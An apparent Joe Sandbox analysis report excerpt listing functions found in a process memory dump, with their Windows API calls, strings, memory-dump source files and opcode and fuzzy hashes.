Function 00007FF7823D9B50 Relevance: 7.8, APIs: 5, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
Instruction ID: 1ce39be5f352f93f2856085d01a7f4bde01f541d0a5b31d07bdb68cb88a58b70
Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
Instruction Fuzzy Hash: 65A1E525B1865291EB50BB25E4646B9F6A1FF88B82FE04179DD4E43F90DFBCE405C720

Function 00007FF7823FFB54 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823FFBC1

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

GetDiskFreeSpaceExW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FFC58
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823FFD01

Strings

%5lu, xrefs: 00007FF7823FFCB0

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset$DiskFreeSpace
String ID: %5lu
API String ID: 2448137811-2100233843
Opcode ID: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
Instruction ID: 0afc16e2bfb4d411225d278d638f57aff3b26d6d70b1309a27d0be1a8d754725
Opcode Fuzzy Hash: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
Instruction Fuzzy Hash: B141C436708AC195EB61EF11E8546EAB760FB84789F908035EE4D0BB98DFBCD549C710

Function 00007FF7823DD250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 00007FF7823DD292

Strings

GeToken: (%x) '%s', xrefs: 00007FF7823ED0C8

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: _wcsicmp
String ID: GeToken: (%x) '%s'
API String ID: 2081463915-1994581435
Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
Instruction ID: 18b1c8fa55a4f892dffea254e978dc236638678f373097f12f121675db383e6a
Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
Instruction Fuzzy Hash: C0718C21E0C25685FB64BB25A8682B5BAA0FF00782FF40579D50D43AE1DFFCE885C630

Function 00007FF7823D81D4 Relevance: 4.8, APIs: 3, Instructions: 299COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 00007FF7823D826E
wcschr.MSVCRT ref: 00007FF7823D8289

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: wcschr
String ID:
API String ID: 1497570035-0
Opcode ID: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
Instruction ID: ee1773b877ea09041f00142a83d15ae997d923350cb750501ebb92388101b46a
Opcode Fuzzy Hash: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
Instruction Fuzzy Hash: 78C15665B0824292EA50BB11E4602B9F3A1FF84792FA44179DA4E43FD5DFBCF846C320

Function 00007FF7823F7B4C Relevance: 4.8, APIs: 3, Instructions: 269fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823F7CE2
FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823F7E92
FindClose.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823F7EB0

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
Instruction ID: dc618904f642cb68a7a720ccaf9cb32d50de70c15597768ffb1a341704506d04
Opcode Fuzzy Hash: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
Instruction Fuzzy Hash: D2A15B11B18A4251EE54BF65A434179E690BF54FE2FE44239EE6E47BC4EE7CE841C320

Function 00007FF7823D6BE0 Relevance: 4.7, APIs: 3, Instructions: 184COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7823DCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDA6
Part of subcall function 00007FF7823DCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDBD

_pipe.MSVCRT ref: 00007FF7823D6C1E

Part of subcall function 00007FF7823DAFFC: _dup.MSVCRT ref: 00007FF7823DB004

Part of subcall function 00007FF7823DB038: _dup2.MSVCRT ref: 00007FF7823DB04D

_get_osfhandle.MSVCRT ref: 00007FF7823D6CD1
DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7823D6CFB

Part of subcall function 00007FF7823DB998: memset.MSVCRT ref: 00007FF7823DBA2B
Part of subcall function 00007FF7823DB998: wcschr.MSVCRT ref: 00007FF7823DBA8A
Part of subcall function 00007FF7823DB998: wcschr.MSVCRT ref: 00007FF7823DBAAA
Part of subcall function 00007FF7823DB998: _wcsicmp.MSVCRT ref: 00007FF7823DBB2C

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Heapwcschr$AllocDuplicateHandleProcess_dup_dup2_get_osfhandle_pipe_wcsicmpmemset
String ID:
API String ID: 624391571-0
Opcode ID: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
Instruction ID: d9373a59a79bad110829270ca72687f65e2e9aaa7cf678b5a01f8779df87f887
Opcode Fuzzy Hash: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
Instruction Fuzzy Hash: F271BF71A0860286E704BF35E864178B6A2FF84756BB48278EA1D577D5CF7CE852CB30

Function 00007FF7823F63FC Relevance: 4.7, APIs: 3, Instructions: 179threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823F64FD
IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0 ref: 00007FF7823F65F5
OutputDebugStringW.API-MS-WIN-CORE-DEBUG-L1-1-0 ref: 00007FF7823F666F

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: CurrentDebugDebuggerOutputPresentStringThread
String ID:
API String ID: 4268342597-0
Opcode ID: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
Instruction ID: 064861aaf8c905b79d5fd2754d0b69a92cb0546e1f77a69751abe4b84fd3f35e
Opcode Fuzzy Hash: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
Instruction Fuzzy Hash: CA816432A08B8281EF54AF26A450239B7A0FF55B86FA45179CD5D03B55DFBCE980CB70

Function 00007FF7823E88C0 Relevance: 4.6, APIs: 3, Instructions: 68nativethreadCOMMON

Download Yara Rule

APIs

NtOpenThreadToken.NTDLL ref: 00007FF7823E88E7
NtOpenProcessToken.NTDLL ref: 00007FF7823E8907
NtClose.NTDLL ref: 00007FF7823E896C

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: OpenToken$CloseProcessThread
String ID:
API String ID: 2991381754-0
Opcode ID: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
Instruction ID: 04c74025961ada6152f3c40a18d25edd51bf312746372050b3e385179ac18c64
Opcode Fuzzy Hash: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
Instruction Fuzzy Hash: D9219E36E0874297E740AB50D4542BDFB60FB957A2FA04179EB5943A94DFBCE848CB10

Function 00007FF7823D586C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF7823FC59E), ref: 00007FF7823D5879

Part of subcall function 00007FF7823D58D4: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823D5903
Part of subcall function 00007FF7823D58D4: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823D5943
Part of subcall function 00007FF7823D58D4: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823D5956

Strings

%d.%d.%05d.%d, xrefs: 00007FF7823D58B2

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: CloseOpenQueryValueVersion
String ID: %d.%d.%05d.%d
API String ID: 2996790148-3457777122
Opcode ID: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
Instruction ID: e56743e282bb318ad22fd6bec8f89c0f0af2c7536d02760ef7d7ff5c7319ce8a
Opcode Fuzzy Hash: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
Instruction Fuzzy Hash: 08F0A762A0838197D350AF16B44006AEB51FB84781FA04138D94D07F59CF7CD554CB50

Function 00007FF7823E7854 Relevance: 3.3, APIs: 2, Instructions: 296COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823E790B

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823E7B79

Part of subcall function 00007FF7823E823C: FindFirstFileExW.KERNELBASE ref: 00007FF7823E8280
Part of subcall function 00007FF7823E823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823E829D

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset$ErrorFileFindFirstLast
String ID:
API String ID: 2831795651-0
Opcode ID: 43a4daf2934dc4b37ff691b1a4b1263eebb1773a1fb1ad015dd0d80b276b2dc6
Instruction ID: 7155248cc791c010b70470c46e7c386fb314711901b55eb81a3c6a0ea2c96510
Opcode Fuzzy Hash: 43a4daf2934dc4b37ff691b1a4b1263eebb1773a1fb1ad015dd0d80b276b2dc6
Instruction Fuzzy Hash: 83D1F676A08682A6E760EF21E4602BAB7A0FB44795FB01179DE4D07F98DFBCD445C710

Function 00007FF7823D7D30 Relevance: 3.3, APIs: 2, Instructions: 252COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823D7DA1

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

Part of subcall function 00007FF7823E417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823E41AD

Part of subcall function 00007FF7823DD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD46E
Part of subcall function 00007FF7823DD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD485
Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD4EE
Part of subcall function 00007FF7823DD3F0: iswspace.MSVCRT ref: 00007FF7823DD54D
Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD569
Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD58C

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D7EB7

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
String ID:
API String ID: 168394030-0
Opcode ID: a65c63928f551fb8768bc8e3d10b498b84304c82453fdb636945e23039fb0caa
Instruction ID: ecfbc78a63e528ead967b5d63eddff99ed1ed1b30471f1088bd620fb4aacef92
Opcode Fuzzy Hash: a65c63928f551fb8768bc8e3d10b498b84304c82453fdb636945e23039fb0caa
Instruction Fuzzy Hash: B6A12865B08642A5FB65EB25D8242B9A392FF84785FE04178D90D47EE4DFBCE849C320

Function 00007FF7823E89E4 Relevance: 3.0, APIs: 2, Instructions: 43nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationToken.NTDLL ref: 00007FF7823E8A20
NtQueryInformationToken.NTDLL ref: 00007FF7823F52BE

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: InformationQueryToken
String ID:
API String ID: 4239771691-0
Opcode ID: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
Instruction ID: 284ce42c6d18dc830aff3cae901e1b4dc6fb0a8d290c9bb71124bef81289b538
Opcode Fuzzy Hash: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
Instruction Fuzzy Hash: 1A115276A18781DBEB109F01E4003A9FBA4FB85796F904175DB4802AA4DBBDE588CB50

Function 00007FF7823E8114 Relevance: 3.0, APIs: 2, Instructions: 41filenativeCOMMON

Download Yara Rule

APIs

NtQueryVolumeInformationFile.NTDLL ref: 00007FF7823E8151
GetFileInformationByHandleEx.API-MS-WIN-CORE-FILE-L2-1-0 ref: 00007FF7823F037C

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: FileInformation$HandleQueryVolume
String ID:
API String ID: 2149833895-0
Opcode ID: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
Instruction ID: 6eed077d4d6ff4432fb33a58dff32f921cac640f0d099a7565ee71823a3d4861
Opcode Fuzzy Hash: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
Instruction Fuzzy Hash: F7118F22A0878186E7609B51F4407AAE7A0FB44B45F904575DA8D43E54DBFCD48DDB10

Function 00007FF7823D8510 Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7823DD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD46E
Part of subcall function 00007FF7823DD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD485
Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD4EE
Part of subcall function 00007FF7823DD3F0: iswspace.MSVCRT ref: 00007FF7823DD54D
Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD569
Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD58C

towupper.MSVCRT ref: 00007FF7823D85D4

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: wcschr$Heap$AllocProcessiswspacetowupper
String ID:
API String ID: 3520273530-0
Opcode ID: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
Instruction ID: 6706f62d72011cecd0b09ca25b44a11e22d28888155ff1b9b610b52c715a7cee
Opcode Fuzzy Hash: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
Instruction Fuzzy Hash: 28610561A0C202A1F7657F24D52837CA2A2FF04755FA0417ADA1E56ED5DFBCE885C331

Function 00007FF7823E898C Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationToken.NTDLL ref: 00007FF7823E89B6

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: InformationQueryToken
String ID:
API String ID: 4239771691-0
Opcode ID: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
Instruction ID: 9d9e061e0de40434170c9bc62c653c6384da9c94aea7b568a1df533b82248515
Opcode Fuzzy Hash: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
Instruction Fuzzy Hash: BEF0A0B3B04B81CBC7008F64E08849CBB78F704B84BA5843ACB2C03704DBB1D9A4CB50

Function 00007FF7823E93B0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823E93BB

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
